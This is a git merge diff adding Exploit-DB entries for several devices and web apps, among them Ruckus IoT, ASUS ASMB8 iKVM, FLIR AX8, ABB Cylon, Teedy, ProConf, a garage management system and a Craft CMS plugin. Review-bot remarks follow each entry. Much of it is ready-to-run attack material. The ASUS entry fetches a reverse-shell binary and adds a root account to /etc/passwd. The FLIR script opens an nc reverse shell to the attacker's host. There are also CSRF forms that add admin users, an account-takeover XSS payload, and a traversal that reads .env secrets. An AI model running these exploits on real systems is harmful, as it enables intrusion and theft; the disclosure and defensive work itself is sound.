Merge remote-tracking branch 'exploitdb/main'

This commit is contained in:
Brendan McDevitt 2025-04-18 00:01:14 +00:00
commit 682b78fb31
24 changed files with 1845 additions and 1 deletions

@ -0,0 +1,110 @@
# Exploit Title: CommScope Ruckus IoT Controller 1.7.1.0 - Undocumented Account
# Date: 2021.05.26
# Exploit Author: korelogic
# Vendor Homepage: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf
# Affected Product: Ruckus IoT Controller
# Version: 1.7.1.0 and earlier
# Tested on: Linux
# CVE : CVE-2021-33216,CVE-2019-1000018
KL-001-2021-007: CommScope Ruckus IoT Controller Undocumented Account
Advisory ID: KL-001-2021-007
Publication Date: 2021.05.26
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2021-007.txt
1. Vulnerability Details
Affected Vendor: CommScope
Affected Product: Ruckus IoT Controller
Affected Version: 1.7.1.0 and earlier
Platform: Linux
CWE Classification: CWE-798: Use of Hard-coded Credentials, CWE-912: Hidden Functionality
CVE ID: CVE-2021-33216
2. Vulnerability Description
An upgrade account is included in the IoT Controller OVA that
provides the vendor undocumented access via Secure Copy (SCP).
3. Technical Description
Once the OVA is imported into VirtualBox, a VMDK file is
created. The VMDK file can be mounted and the directory
structure and its contents can be perused.
An authorized_keys file exists that allows an
individual/organization possessing the SSH private key to
access the virtual appliance using the 'vriotiotupgrade'
account. The 'vriotiotupgrade' account is restricted to scp,
per the rssh configuration.
Additionally, it appears that the IoT Controller has rssh version 2.3.4
installed and in use. At the time of this advisory, there are at least
three remote command injection vulnerabilities in this particular version
of rssh: CVE-2019-3463, CVE-2019-3464 and CVE-2019-1000018.
4. Mitigation and Remediation Recommendation
The vendor has released an updated firmware (1.8.0.0) which
remediates the described vulnerability. Firmware and release
notes are available at:
https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf
5. Credit
This vulnerability was discovered by Jim Becher (@jimbecher)
of KoreLogic, Inc.
6. Disclosure Timeline
2021.03.30 - KoreLogic submits vulnerability details to
CommScope.
2021.03.30 - CommScope acknowledges receipt and the intention
to investigate.
2021.04.06 - CommScope notifies KoreLogic that this issue,
along with several others reported by KoreLogic,
will require more than the standard 45 business
day remediation timeline.
2021.04.06 - KoreLogic agrees to extend disclosure embargo if
necessary.
2021.04.30 - CommScope informs KoreLogic that remediation for
this vulnerability will be available inside of the
standard 45 business day timeline. Requests
KoreLogic acquire CVE number for this
vulnerability.
2021.05.14 - 30 business days have elapsed since the
vulnerability was reported to CommScope.
2021.05.17 - CommScope notifies KoreLogic that the patched
version of the firmware will be available the week
of 2021.05.24.
2021.05.19 - KoreLogic requests CVE from MITRE.
2021.05.19 - MITRE issues CVE-2021-33216.
2021.05.25 - CommScope releases firmware 1.8.0.0 and associated
advisory.
2021.05.26 - KoreLogic public disclosure.
7. Proof of Concept
With the VMDK file mounted at the current working directory:
$ find . -name authorized_keys
./VRIOT/ap-images/authorized_keys
./VRIOT/ops/ap-images/authorized_keys
$ cat VRIOT/ap-images/authorized_keys
ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAACAQCp1X4UH+0IALnLKsqbSZwgbzA1clXWXguNpTZ+Km7irkMaXVRt6IL78mdK+nKUvvQcRnAhQ0TgoqINrdLzMTYwoVaOcBq5Lw21A5JrP8IQANMAiVSM30umJYuTqnbPO4HHIi9/Gk/wUtJiwvD/ygNx7z0g1a9PIzQxOITLpwVkEU2iDdlrZDHR35jI/ddRRsbPe9ezeYGDoprgQagw634fa9tzI74oj5/Xh64679yjA0bQx+i8ZXSIHFPSHp0yiDyMZfvLIqdqb0mEAN1JnaHfIiq4o8/wa8zp7nVADo6Pxweklc1kqALFUxrzdP/6Z0hITp1Ke/xdA2S4LT3ye85QVM/k3Dd54qFpMAJsinYb18Ykyj0PTZskcBWB+l9VevpJXv+3DDH2+98Ledv/fnXQ9VapxW572fX2HkEoh4Nmt5VUx0JPR/0onwOVeuwQLp5qnHxmzgL8DMS62QkTT1VdaCqXS01DMPorKQUtmvAxohJUJX4df9JoOcwRpvKSspn+6UU1krPZHX1QYvPrRsfYhJ9SCzrVxmuC0DR3FqxGoix5su4DqCpRxq0QhwC4+DwIMt4KTIjF3p35s+bjP1luwITJOxVlIswpyZKS0hITFLJtAE7c493wX7hxUdy+LfyHXlMIoJcYM11WXLAysHcWyfmSpQ8H5GV0vxela0Qg7Q==
chandini.venkatesh@commscope.com
$ cat VRIOT/ops/ap-images/authorized_keys
ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAACAQCp1X4UH+0IALnLKsqbSZwgbzA1clXWXguNpTZ+Km7irkMaXVRt6IL78mdK+nKUvvQcRnAhQ0TgoqINrdLzMTYwoVaOcBq5Lw21A5JrP8IQANMAiVSM30umJYuTqnbPO4HHIi9/Gk/wUtJiwvD/ygNx7z0g1a9PIzQxOITLpwVkEU2iDdlrZDHR35jI/ddRRsbPe9ezeYGDoprgQagw634fa9tzI74oj5/Xh64679yjA0bQx+i8ZXSIHFPSHp0yiDyMZfvLIqdqb0mEAN1JnaHfIiq4o8/wa8zp7nVADo6Pxweklc1kqALFUxrzdP/6Z0hITp1Ke/xdA2S4LT3ye85QVM/k3Dd54qFpMAJsinYb18Ykyj0PTZskcBWB+l9VevpJXv+3DDH2+98Ledv/fnXQ9VapxW572fX2HkEoh4Nmt5VUx0JPR/0onwOVeuwQLp5qnHxmzgL8DMS62QkTT1VdaCqXS01DMPorKQUtmvAxohJUJX4df9JoOcwRpvKSspn+6UU1krPZHX1QYvPrRsfYhJ9SCzrVxmuC0DR3FqxGoix5su4DqCpRxq0QhwC4+DwIMt4KTIjF3p35s+bjP1luwITJOxVlIswpyZKS0hITFLJtAE7c493wX7hxUdy+LfyHXlMIoJcYM11WXLAysHcWyfmSpQ8H5GV0vxela0Qg7Q==
chandini.venkatesh@commscope.com
$ grep "ap-images" etc/passwd
vriotiotupgrade:x:1002:1002::/VRIOT/ap-images/:/usr/bin/rssh
$ tail -8 etc/ssh/sshd_config
Match User vriotiotupgrade
PasswordAuthentication no
AuthorizedKeysFile /VRIOT/ap-images/authorized_keys
Match User vriotha
PasswordAuthentication yes
$ grep -v ^# etc/rssh.conf
logfacility = LOG_USER
allowscp
umask = 022
The contents of this advisory are copyright(c) 2021
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt
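Review bot: the `# Vendor Homepage:` header points at the CommScope security-advisory PDF rather than the vendor site, and the same PDF URL is repeated in section 4 as the firmware/release-notes link; set the header to the vendor homepage and keep the PDF only in section 4. The `# CVE :` header also lists CVE-2019-1000018 without saying that section 3 attributes it to the bundled rssh 2.3.4 rather than to the undocumented account itself (CVE-2021-33216); a short qualifier there keeps the index entry accurate. Section 4 could also state the defensive check that the proof of concept already implies: after upgrading to 1.8.0.0, confirm that no `authorized_keys` remains under `/VRIOT/ap-images/` or `/VRIOT/ops/ap-images/`, that the `vriotiotupgrade` entry is gone from `/etc/passwd`, and that the `Match User vriotiotupgrade` block is gone from `sshd_config`.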

@ -0,0 +1,61 @@
# Exploit Title: ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE)
# Date: 2023-02-16
# Exploit Author: d1g@segfault.net for NetworkSEC [NWSSA-002-2023], SC
# Vendor Homepage: https://servers.asus.com/search?q=ASMB8
# Version/Model: ASMB8 iKVM Firmware <= 1.14.51 (probably others)
# Tested on: Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl
# CVE: CVE-2023-26602
++++++++++++++++++++
0x00 DESCRIPTION
++++++++++++++++++++
During a recent engagement, a remote server management interface has been
discovered. Furthermore, SNMPv2 was found to be enabled, offering write
access to the private community, subsequently allowing us to introduce
SNMP arbitrary extensions to achieve RCE.
We also found a hardcoded account sysadmin:superuser by cracking the
shadow file (md5crypt) found on the system and identifed an "anonymous"
user w/ the same password, however a lock seems to be in place to prevent
using these credentials via SSH (running defshell as default shell).
+++++++++++++++
0x01 IMPACT
+++++++++++++++
By exploiting SNMP arbitrary extension, we are able to run any command on
the system w/ root privileges, and we are able to introduce our own user
circumventing the defshell restriction for SSH.
+++++++++++++++++++++++++++++++
0x02 PROOF OF CONCEPT (PoC)
+++++++++++++++++++++++++++++++
At first, we have to create required extensions on the system, e.g. via
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "[command]"'
and if everything is set, we can just run that command by
snmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects
which will execute our defined command and show us its output.
+++++++++++++++++++++++++++++++
0x03 SSH Remote Root Access
+++++++++++++++++++++++++++++++
The identified RCE can be used to transfer a reverse tcp shell created
by msfvenom for arm little-endian, e.g.
msfvenom -p linux/armle/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin
We can now transfer the binary, adjust permissions and finally run it:
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin"'
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod +x /var/tmp/rt.bin"'
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "/var/tmp/rt.bin"'
Again, we have to request execution of the lines in the MIB via:
snmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects
We get a reverse connection from the host, and can now act on the local system
to easily echo our own line into /etc/passwd:
echo d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd
By setting the standard shell to /bin/sh, we are able to get a SSH root
shell into the system, effectively circumventing the defshell restriction.
$ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g
BusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# uname -a
Linux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown
# uptime
15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25
# head -n 1 /etc/shadow
sysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7:::
---
#EOF
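Review bot: the first `snmpbulkwalk` line under 0x02 uses the placeholder `x.x.x` while every other command in the file uses `x.x.x.x`, and 0x00 has the typo "identifed"; both should be tidied before indexing. The write-up names the root cause (SNMPv2c write access on the `private` community plus a hard-coded `sysadmin` credential) but has no mitigation section; a short one recommending that SNMP write access be disabled or the default community strings replaced, that SNMP be restricted to a management network, and that firmware newer than 1.14.51 be installed would make the entry usable for defenders. The shadow line printed under 0x03 is a real credential hash from a device whose cleartext is already stated in 0x00; consider whether it needs to remain in the public entry.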

exploits/hardware/remote/52246.py (executable file, 171 lines changed): file diff suppressed because one or more lines are too long

@ -0,0 +1,82 @@
# Exploit Title: FLIR AX8 1.46.16 - Remote Command Injection
# Date: 8/19/2022
# Exploit Author: Samy Younsi Naqwada (https://samy.link), SC
# Vendor Homepage: https://www.flir.com/
# Software Link: https://www.flir.com/products/ax8-automation/
# PoC: https://www.youtube.com/watch?v=dh0_rfAIWok
# Version: 1.46.16 and under.
# Tested on: FLIR AX8 version 1.46.16 (Ubuntu)
# CVE : CVE-2022-37061
from __future__ import print_function, unicode_literals
from bs4 import BeautifulSoup
import argparse
import requests
import json
import urllib3
urllib3.disable_warnings()
def banner():
flirLogo = """
.---------------------.
/--'--.------.--------/|
|Say :) |__Ll__| [==] ||
|cheese!| .--. | '''' ||
| |( () )| ||
| | `--` | |/
`-------`------`------`
\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m
\033[1;91mFLIR AX8 Unauthenticated OS Command Injection\033[1;m
FOR EDUCATIONAL PURPOSE ONLY.
"""
return print('\033[1;94m{}\033[1;m'.format(flirLogo))
def pingWebInterface(RHOST, RPORT):
url = 'http://{}:{}/login/'.format(RHOST, RPORT)
response = requests.get(url, allow_redirects=False, verify=False, timeout=60)
try:
if response.status_code != 200:
print('[!] \033[1;91mError: FLIR AX8 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
exit()
soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
version = soup.find('p', id='login-title').string
print('[INFO] {} detected.'.format(version))
except:
print('[ERROR] Can\'t grab the device version...')
def execReverseShell(RHOST, RPORT, LHOST, LPORT):
url = 'http://{}:{}/res.php'.format(RHOST, RPORT)
payload = 'rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20{}%20{}%20%3E%2Ftmp%2Ff'.format(LHOST, LHOST)
data = 'action=alarm&id=2;{}'.format(payload)
headers = {
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
}
try:
print('[INFO] Executing reverse shell...')
response = requests.post(url, headers=headers, data=data, allow_redirects=False, verify=False)
print('Reverse shell successfully executed. {}:{}'.format(LHOST, LPORT))
return
except Exception as e:
print('Reverse shell failed. Make sure the FLIR AX8 device can reach the host {}:{}').format(LHOST, LPORT)
return False
def main():
banner()
parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on FLIR AX8 devices.', add_help=False)
parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (FLIR AX8 device)", type=str, required=True)
parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True)
parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
args = parser.parse_args()
pingWebInterface(args.RHOST, args.RPORT)
execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)
if __name__ == "__main__":
main()
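Review bot: the `except` branch in `execReverseShell` calls `.format()` on the return value of `print()` (`print('Reverse shell failed. ... {}:{}').format(LHOST, LPORT)`), so any exception from the request is replaced by `AttributeError: 'NoneType' object has no attribute 'format'` and the intended message is never shown; move `.format(...)` inside the `print()` call. In `pingWebInterface`, `requests.get()` runs before the `try:` block, so an unreachable host produces an unhandled `ConnectionError` traceback instead of the friendly error the function prints for a non-200 status, and the bare `except:` that follows also catches the `SystemExit` raised by `exit()`, so the script prints "Can't grab the device version..." and continues into `execReverseShell` even when the check decided to abort; use `except Exception:` and move the request inside the `try`. Minor: `# Date: 8/19/2022` should use the ISO form (`2022-08-19`) used by the other entries in this merge.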

@ -0,0 +1,117 @@
<html>
<!--
ABB Cylon Aspect 3.08.02 (userManagement.php) Cross-Site Request Forgery
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5870
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5870.php
CVE ID: CVE-2024-48846
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48846
21.04.2024
-->
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
// Add User/Admin
<body>
<form action="http://192.168.73.31/userManagement.php" method="POST">
<input type="hidden" name="USER" value="zeroscience" />
<input type="hidden" name="PASSWORD" value="ZSL251" />
<input type="hidden" name="ACTION" value="Add" />
<input type="submit" value="Make me a prince! (php)" />
</form>
</body>
// Add User/Admin
<body>
<form action="http://192.168.73.31:7226/servlet/UserManager" method="POST">
<input type="hidden" name="newuser" value="test" />
<input type="hidden" name="password" value="test123" />
<input type="hidden" name="passwordConfirm" value="test123" />
<input type="hidden" name="Insert" value="Add" />
<input type="submit" value="Make me a prince! (java)" />
</form>
</body>
// Delete User/Admin
<body>
<form action="http://192.168.73.31:7226/servlet/UserManager" method="POST">
<input type="hidden" name="user9" value="test" />
<input type="hidden" name="remove9" value="1" />
<input type="hidden" name="totalRows" value="9" />
<input type="hidden" name="Delete" value="Delete" />
<input type="submit" value="Destr0y" />
</form>
</body>
</html>
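Review bot: the file nests three separate `<body>` elements inside one `<html>`, and the `// Add User/Admin` and `// Delete User/Admin` labels are text content rather than HTML comments, so they render as visible text; either put the three forms in a single `<body>` with `<!-- ... -->` labels or split them into three files. The advisory metadata lives entirely inside the opening HTML comment and lacks the `# Exploit Title:` / `# Date:` / `# CVE:` header lines that the other entries in this merge use and that the exploit index parses; the second ABB entry in this same merge does carry them. The description says requests are accepted "without performing any validity checks"; for defenders that means no anti-CSRF token and no Origin/SameSite enforcement on `userManagement.php` and `servlet/UserManager`, and naming those two controls explicitly would tell readers what a fixed firmware should show.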

@ -0,0 +1,56 @@
# Exploit Title: Teedy 1.11 - Account Takeover via Stored Cross-Site Scripting (XSS)
# Exploit Author: Ayato Shitomi @ Fore-Z co.ltd
# Demo Video: https://www.youtube.com/watch?v=udQgVogsmhA
# Vendor Homepage: https://teedy.io/
# Software Link: https://github.com/Tomblib0/Teedy
# Version: 1.11
# Tested on: Linux
# CVE : CVE-2024-46278
There is a vulnerability that causes XSS when downloading files.
XSS vulnerability could allow a Teedy administrator to rob an account with a few clicks.
Login as an attackers account.
Upload this file as html type. You have to change “Origin” and “Referer” and argument for fetch in need.
```
<script>
const currentCookie = document.cookie;
const requestOptions = {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
'Accept': 'application/json, text/plain, */*',
'Cookie': currentCookie,
'sec-ch-ua': '"Not_A Brand";v="8", "Chromium";v="120"',
'sec-ch-ua-mobile': '?0',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36',
'sec-ch-ua-platform': '"Linux"',
'Origin': 'http://localhost:8080',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty',
'Referer': 'http://localhost:8080/',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US,en;q=0.9'
},
body: 'password=superSecure2&passwordconfirm=superSecure2'
};
fetch('http://localhost:8080/api/user', requestOptions)
.then(response => {
if (!response.ok) {
throw new Error('Network response was not ok');
}
document.write('<h1>Your account was taken over by the attacker LOL</h1>');
return response.json();
})
.then(data => console.log(data))
.catch(error => console.error('There was a problem with your fetch operation:', error));
</script>
```
Login with another account. eg. admin
Click on the file uploaded by the attacker and select Download this file.
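Review bot: the header has no `# Date:` line, unlike the other entries in this merge. The steps read awkwardly ("Login as an attackers account", "and argument for fetch in need"); suggest "Log in with the attacker's account" and "change the Origin and Referer headers and the fetch URL as needed". The description states only the effect, not the defect: from the steps it appears that an uploaded HTML document is returned by the download action in a way that lets the browser render it in the application's origin, which is what allows the script to call `/api/user` with the victim's session. Stating that, together with the corresponding fix (serve user uploads with `Content-Disposition: attachment`, a non-rendering content type, or from a separate origin), would make the entry useful beyond the proof of concept.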

@ -0,0 +1,24 @@
# Exploit Title: ProConf 6.0 - Insecure Direct Object Reference (IDOR)
# Date: 19/07/2018
# Exploit Author: S. M. Zia Ur Rashid, SC
# Author Contact: https://www.linkedin.com/in/ziaurrashid/
# Vendor Homepage: http://proconf.org & http://myproconf.org
# Version: <= 6.0
# Tested on: Windows
# CVE : CVE-2018-16606
# Patched Version: 6.1
# Description:
In ProConf before 6.1, an Insecure Direct Object Reference (IDOR) allows
any author to view and grab all submitted papers (Title and Abstract) and
their authors' personal information (Name, Email, Organization, and
Position) by changing the value of Paper ID (the pid parameter).
# PROOF-OF-CONCEPT
Step 1: Sign In as an author for a conference & submit a paper. Youall get
a paper ID.
Step 2: Now go to paper details and change the value of Paper ID (param
pid=xxxx) to nearest previous value to view others submitted paper &
authors information.
http:// <http:>
[host]/conferences/[conference-name]/author/show_paper_details.php?pid=xxxx
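Review bot: the URL at the end of the proof of concept is split across two lines with mail-client residue (`http:// <http:>`), so it should read as one line: `http://[host]/conferences/[conference-name]/author/show_paper_details.php?pid=xxxx`. "Youall get" is a mangled apostrophe ("You'll get"). Since the entry records a patched version (6.1) without saying what changed, a sentence noting that the expected fix for an IDOR is a server-side ownership check of `pid` against the logged-in author would tell readers what to verify after upgrading.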

@ -0,0 +1,37 @@
# Exploit Title: Garage Management System 1.0 (categoriesName) - Stored XSS
# Date: 18-09-2022
# Exploit Author: Sam Wallace, SC
# Software Link: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2022-41358
Summary:
Garage Management System utilizes client side validation to prevent XSS.
Using burp, a request can be modified and replayed to the server bypassing this validation which creates an avenue for XSS.
Parameter: categoriesName
URI: /garage/php_action/createCategories.php
POC:
POST /garage/php_action/createCategories.php HTTP/1.1
Host: 10.24.0.69
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.24.0.69
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqKDsN4gmatTEEkhS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.24.0.69/garage/add-category.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=gbklvcv3vvv987636urv0gg53u
Connection: close
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="categoriesName"
<script>alert(1)</script>
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="categoriesStatus"
1
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="create"
------WebKitFormBoundaryqKDsN4gmatTEEkhS--
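Review bot: the header is missing the `# Vendor Homepage:` line that the other entries carry (the sourcecodester page is given only as `# Software Link:`). The Summary identifies the root cause as client-side-only validation but does not say on which page the stored `categoriesName` value is later rendered unescaped, which is what a defender needs to confirm the finding and the fix (server-side validation plus output encoding of the category name wherever it is displayed); naming the affected page would complete the entry.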

@ -0,0 +1,137 @@
# Exploit Title: Ethercreative Logs 3.0.3 - Path Traversal
# Date: 2022.01.26
# Exploit Author: Steffen Rogge, SC
# Vendor Homepage: https://github.com/ethercreative/logs
# Software Link: https://plugins.craftcms.com/logs
# Version: <=3.0.3
# Tested on: Linux
# CVE : CVE-2022-23409
product: Ethercreative Logs plugin for Craft CMS
fixed version: >=3.0.4
impact: Medium
found: 2021-07-06
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos company
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"A quick and dirty way to access your logs from inside the CP"
As found on the plugin store page: https://plugins.craftcms.com/logs
Active Installs 4,093 (as of 2021-07-07)
Business recommendation:
------------------------
The vendor provides a patched version v3.0.4 which should be installed immediately.
Vulnerability overview/description:
-----------------------------------
1) Authenticated Path Traversal (CVE-2022-23409)
The plugin "Logs" provides a functionality to read log files of the Craft CMS system inside
the backend of the CMS. As the requested logfile is not properly validated, an attacker is
able to request arbitrary files from the underlying file system with the permissions of the
web service user.
Proof of concept:
-----------------
1) Authenticated Path Traversal (CVE-2022-23409)
As the plugin is installed as an administrator of the system and the function is only accessible
after being logged in as an admin, an attacker needs to be authenticated as an administrator in
the backend in order to extract the needed "{MD5}_identity" cookie for the crafted request.
The vulnerable endpoint is provided by the plugin under the following path:
https://vulnerablesite.com/index.php/admin/actions/logs/logs/stream
The vulnerable controller for that endpoint can be found here:
https://github.com/ethercreative/logs/blob/master/src/Controller.php
The function "actionStream()" provides an endpoint for the Craft CMS and does not validate input
values before file content is being read by the function "file_get_contents".
public function actionStream ()
{
$logsDir = \Craft::getAlias('@storage/logs');
$logFile = \Craft::$app->request->getParam('log');
$currentLog = \Craft::$app->request->get('log', $logFile);
$log = file_get_contents($logsDir . '/' . $currentLog);
exit($log);
}
A crafted GET parameter with the name "log" can be used to access files on the underlying filesystem
with rights as the user executing the web server. In most cases this will be the user "www-data".
In order to read the file ".env" or ".env.php" which contains the environment configuration and as
such also the database credentials, the following request can be used:
GET /admin/actions/logs/logs/stream?log=../../.env HTTP/1.1
Host: <host>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Connection: close
Cookie: 1031b8c41dfff97a311a7ac99863bdc5_identity=<identity_cookie>;
The response then discloses the file content of the file ".env":
HTTP/1.1 200 OK
Date: Thu, 07 Jul 2021 10:08:52 GMT
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: CraftSessionId=2uisculfj8t9q1tnbiukl6ogjf; path=/; secure; HttpOnly
Content-Length: 1600
Connection: close
[...]
$craftEnvVars = [
'DB_DRIVER' => 'mysql',
'DB_SERVER' => '********',
'DB_USER' => '********',
'DB_PASSWORD' => '********',
'DB_DATABASE' => '********',
'DB_SCHEMA' => 'public',
'DB_TABLE_PREFIX' => '',
'DB_PORT' => '********',
'SECURITY_KEY' => '********',
[...]
Vulnerable / tested versions:
-----------------------------
The following version has been tested which was the latest version available at the time
of the test:
* Version 3.0.3 released on November 25, 2019
Distributed through the Craft Plugin Store https://plugins.craftcms.com/logs
Vendor contact timeline:
------------------------
2021-07-07: Contacting vendor through dev@ethercreative.co.uk
2021-07-08: Response from vendor, no encryption available but vendor accepted to be responsible
for any risks involved with plaintext communication
2021-07-08: Advisory was sent to vendor unencrypted
2021-07-09: Vendor released a patch for this vulnerability with version 3.0.4
(https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4)
